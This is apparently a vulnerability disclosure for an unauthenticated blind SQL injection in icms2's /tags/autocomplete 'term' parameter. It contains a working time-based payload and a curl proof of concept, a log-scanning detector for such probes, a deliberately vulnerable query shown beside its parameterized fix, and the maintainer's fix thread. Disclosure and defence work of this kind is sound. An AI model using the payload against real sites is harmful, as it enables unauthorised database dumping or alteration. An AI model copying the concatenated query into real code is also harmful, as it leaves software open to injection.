Unauthenticated Blind SQL Injection in '/tags/autocomplete' in instantsoft/icms2

Valid

Reported on

Aug 2nd 2023


Description

The application was found to be vulnerable to an unauthenticated blind SQL injection in the /tags/autocomplete page.
The GET parameter term does not sufficiently sanitize input.

Proof of Concept

  1. Make a GET request to http://icms.local/tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=' and observe that the server's response is delayed by the injected SLEEP.

     GET /tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=' HTTP/1.1
     Host: icms.local
     X-Requested-With: XMLHttpRequest

  2. Replace the hostname below where necessary:

     curl -i -s -k -X $'GET' \
         -H $'Host: icms.local' -H $'X-Requested-With: XMLHttpRequest' \
         $'http://icms.local/tags/autocomplete?term=\')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=\''

  3. As long as X-Requested-With: XMLHttpRequest is in the HTTP request headers, an unauthenticated attacker can make the request directly to inject into the affected parameter.
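The request above leaves a recognisable trace in web-server access logs: a URL-encoded time-delay function in the term parameter and a response that takes about as long as the requested sleep. The following Python script is an added example (not part of the huntr report or of icms2) that scans constructed access-log lines for exactly that combination. The log format (Apache combined format with a trailing request-duration field in seconds), the sample lines, and the 5-second slowness threshold are all assumptions made for the illustration.

```python
"""Detect time-based SQL injection attempts against /tags/autocomplete in
access logs. Added example; not part of the huntr report or of icms2.
The log layout (combined format plus a trailing duration in seconds), the
sample lines and the thresholds are constructed for illustration."""
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample lines; the second one carries the report's payload.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Aug/2023:10:01:02 +0000] "GET /tags/autocomplete?term=sec HTTP/1.1" 200 87 "-" "Mozilla/5.0" 0.012
10.0.0.9 - - [02/Aug/2023:10:01:07 +0000] "GET /tags/autocomplete?term=%27%29+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%2810%29%29%29x%29+AND+%281%3D%27 HTTP/1.1" 200 2 "-" "curl/8.1.2" 10.004
10.0.0.5 - - [02/Aug/2023:10:01:09 +0000] "GET /tags/autocomplete?term=sleepy HTTP/1.1" 200 91 "-" "Mozilla/5.0" 0.010
10.0.0.9 - - [02/Aug/2023:10:01:21 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "curl/8.1.2" 0.030
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<secs>[\d.]+)$'
)

# MySQL's delay functions, matched after URL decoding. Requiring the opening
# parenthesis keeps ordinary words such as "sleepy" from matching.
TIME_FUNCS_RE = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.IGNORECASE)
# A quote immediately followed by ")" is the break-out the report's payload uses.
BREAKOUT_RE = re.compile(r"['\"]\s*\)")
SLOW_THRESHOLD = 5.0   # assumed: a normal autocomplete answer takes milliseconds


def inspect_line(line):
    """Return a dict describing the request if it looks like a time-based
    injection attempt on /tags/autocomplete, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if parts.path != '/tags/autocomplete':
        return None
    term = parse_qs(parts.query).get('term', [''])[0]   # parse_qs decodes once
    term = unquote_plus(term)   # second pass catches double-encoded payloads
    reasons = []
    if TIME_FUNCS_RE.search(term):
        reasons.append('time-delay function in term')
    if BREAKOUT_RE.search(term):
        reasons.append('quote/paren break-out in term')
    secs = float(m.group('secs'))
    if secs >= SLOW_THRESHOLD:
        reasons.append(f'slow response {secs:.1f}s')
    if not reasons:
        return None
    return {'ip': m.group('ip'), 'term': term, 'secs': secs, 'reasons': reasons}


def scan(log_text):
    """Run inspect_line over every line and keep the hits."""
    return [hit for hit in (inspect_line(l) for l in log_text.splitlines()) if hit]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The payload indicators and the latency indicator are checked independently on purpose: a blind injection probe that uses a delay function the scanner does not list still shows up through the slow response, and a probe that was blocked before reaching the database still shows up through its decoded term.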

Remedial Action

It is recommended to sanitize the affected parameter term before it is used in the database query.
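To make the remediation concrete, the Python script below is an added example (not the icms2 code and not part of the huntr report) that places an assumed vulnerable query construction next to its parameterized replacement. The query shape, a LIKE 'term%' built by string concatenation, is an assumption chosen so that the report's payload fits it; SQLite stands in for MySQL, and because SQLite has no SLEEP function, the vulnerable variant fails with an error that itself proves the injected text reached the SQL parser, while the parameterized variant treats the same input as an ordinary search string.

```python
"""Vulnerable vs. parameterized construction of a tag-autocomplete query.
Added example; not the icms2 code and not part of the huntr report. The
query shape is assumed so that the report's payload fits it; SQLite stands
in for MySQL."""
import sqlite3

# Payload from the report, URL-decoded.
PAYLOAD = "') AND (SELECT 1 FROM (SELECT(SLEEP(10)))x) AND (1='"


def make_db():
    """In-memory table with constructed sample tags."""
    db = sqlite3.connect(':memory:')
    db.execute('CREATE TABLE tags (id INTEGER PRIMARY KEY, title TEXT NOT NULL)')
    db.executemany('INSERT INTO tags (title) VALUES (?)',
                   [('security',), ('secrets',), ('php',), ('sql',)])
    return db


def autocomplete_vulnerable(db, term):
    """Assumed vulnerable pattern: the user-supplied term is spliced into the
    SQL text, so a quote in it changes the structure of the statement."""
    sql = "SELECT title FROM tags WHERE title LIKE ('" + term + "%') ORDER BY title"
    return [row[0] for row in db.execute(sql)]


def autocomplete_fixed(db, term):
    """Parameterized form: the term is passed as a bound value, so the engine
    only ever compares it as data and never parses it as SQL."""
    sql = 'SELECT title FROM tags WHERE title LIKE ? ORDER BY title'
    return [row[0] for row in db.execute(sql, (term + '%',))]


def demonstrate(term):
    """Run both variants on the same term and report whether the vulnerable
    one let the term reach the SQL parser. With the report's payload the
    vulnerable variant makes SQLite try to call SLEEP(), which it lacks; the
    resulting error is the evidence of injection."""
    db = make_db()
    try:
        vulnerable = autocomplete_vulnerable(db, term)
        injected = False
    except sqlite3.OperationalError as exc:
        vulnerable = f'error: {exc}'
        injected = 'SLEEP' in str(exc)
    fixed = autocomplete_fixed(db, term)
    return {'vulnerable': vulnerable, 'injected': injected, 'fixed': fixed}


if __name__ == '__main__':
    print(demonstrate('sec'))
    print(demonstrate(PAYLOAD))
```

On a real MySQL backend the vulnerable variant would instead pause for ten seconds, which is the behaviour the report's PoC observes; the parameterized variant behaves identically on either engine, returning no rows because no tag title starts with the payload text.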

Impact

Unauthenticated users are able to dump or alter data from the database via the affected page and parameter.

We are processing your report and will contact the instantsoft/icms2 team within 24 hours. 4 months ago
We have contacted a member of the instantsoft/icms2 team and are waiting to hear back 4 months ago
instantsoft/icms2 maintainer (Maintainer), 4 months ago:

Fixed https://github.com/instantsoft/icms2/commit/1dbc3e6c8fbf5d2dc551cb27fad0de3584dee40f

instantsoft/icms2 maintainer modified the Severity from Critical (9.8) to Critical (9.8) 4 months ago
instantsoft/icms2 maintainer validated this vulnerability 4 months ago
legpains has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
instantsoft/icms2 maintainer marked this as fixed in 2.16.1-git with commit 1dbc3e 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
autocomplete.php#L21 has been validated
instantsoft/icms2 maintainer published this vulnerability 4 months ago
instantsoft/icms2 maintainer gave praise 4 months ago
Thank you!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
instantsoft/icms2 maintainer (Maintainer), 4 months ago:

If I've done something wrong in this topic, please post. First time here.
